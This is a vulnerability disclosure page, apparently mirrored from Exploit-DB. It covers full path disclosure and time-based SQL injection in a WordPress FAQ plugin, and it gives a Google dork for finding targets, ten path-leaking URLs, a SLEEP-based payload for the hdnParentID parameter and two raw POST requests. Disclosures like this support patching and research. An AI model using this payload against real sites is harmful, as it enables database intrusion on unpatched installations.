header-logo
Suggest Exploit
vendor:
Q and A Focus Plus FAQ
by:
Gwendal Le Coguic
7,5
CVSS
HIGH
Full Path Disclosure and SQL Injection
79
CWE
Product Name: Q and A Focus Plus FAQ
Affected Version From: 1.3.9.7
Affected Version To: Prior
Patch Exists: YES
Related CWE: N/A
CPE: a:lanexatek_creations:q_and_a_focus_plus_faq
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: WordPress
2016

WordPress Q and A (Focus Plus) FAQ Full Path Disclosure and SQL Injection

The plugin was originally named 'Q and A FAQ' and developped by Raygun company then it has been involved and renamed to 'Q and A Focus Plus FAQ' by Lanexatek Creations. Full Path Disclosure vulnerabilities exist in multiple files of the plugin. SQL Injection vulnerabilities exist in two places, parameter hdnParentID is vulnerable. Payload: 0 AND (SELECT * FROM (SELECT(SLEEP(5)))zeCb)

Mitigation:

The vulnerabilities are mitigated by the fact that you have to be connected as an admin to exploit them.
Source

Exploit-DB raw data:

# Exploit Title: WordPress Q and A (Focus Plus) FAQ Full Path Disclosure and SQL Injection
# Google Dork: inurl:"wp-content/plugins/q-and-a"
# Date: 12-05-2016
# Software Link: https://wordpress.org/plugins/q-and-a-focus-plus-faq/
# Version: 1.3.9.7 and prior
# Exploit Author: Gwendal Le Coguic
# Website: http://10degres.net
# Category: webapps


Create a powerful and easy to use FAQ & knowledge base on your WordPress site.
A powerful and easy to use full-featured FAQ with comments, tags and ratings for your WordPress site.

The plugin was originally named "Q and A FAQ" and developped by Raygun company 
then it has been involved and renamed to "Q and A Focus Plus FAQ" by Lanexatek Creations.


##### Full Path Disclosure #####

http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/q-and-a-focus-plus.php
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/admin/q-a-focus-plus-admin.php
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/admin/documentation.php
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/custom-post.php
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/functions.php
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/ratings.php
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/reorder.php
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/shortcodes.php
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/upgrader.php
http://[target]/wp-content/plugins/q-and-a-focus-plus-faq/inc/widgets.php


##### SQL Injection #####

Those vulnerabilities are mitigated by the fact that you have to be connected as an admin to exploit them.

Paramater hdnParentID is vulnerable in two places.
Payload: 0 AND (SELECT * FROM (SELECT(SLEEP(5)))zeCb)

1/ line 46: $parentsParent = $wpdb->get_row("SELECT post_parent FROM $wpdb->posts WHERE ID = " . $_POST['hdnParentID']...

POST /wp-admin/edit.php?post_type=qa_faqs&page=faqpageorder HTTP/1.1
Host: [target]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 165

btnOrderPages=Click+to+Reorder+FAQs&hdnfaqpageorder=id_8%2Cid_6%2Cid_5&btnReturnParent=Return+to+parent+page&hdnParentID=0


2/ line 254: $wpdb->get_results("SELECT * FROM $wpdb->posts WHERE post_parent = $parentID and ...

POST /wp-admin/edit.php?post_type=qa_faqs&page=faqpageorder HTTP/1.1
Host: [target]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

btnOrderPages=Click+to+Reorder+FAQs&hdnfaqpageorder=id_8%2Cid_6%2Cid_5&hdnParentID=0


##### References #####

https://www.owasp.org/index.php/Full_Path_Disclosure
https://www.owasp.org/index.php/SQL_Injection

Navigation

Suggest Exploit

Services By CQR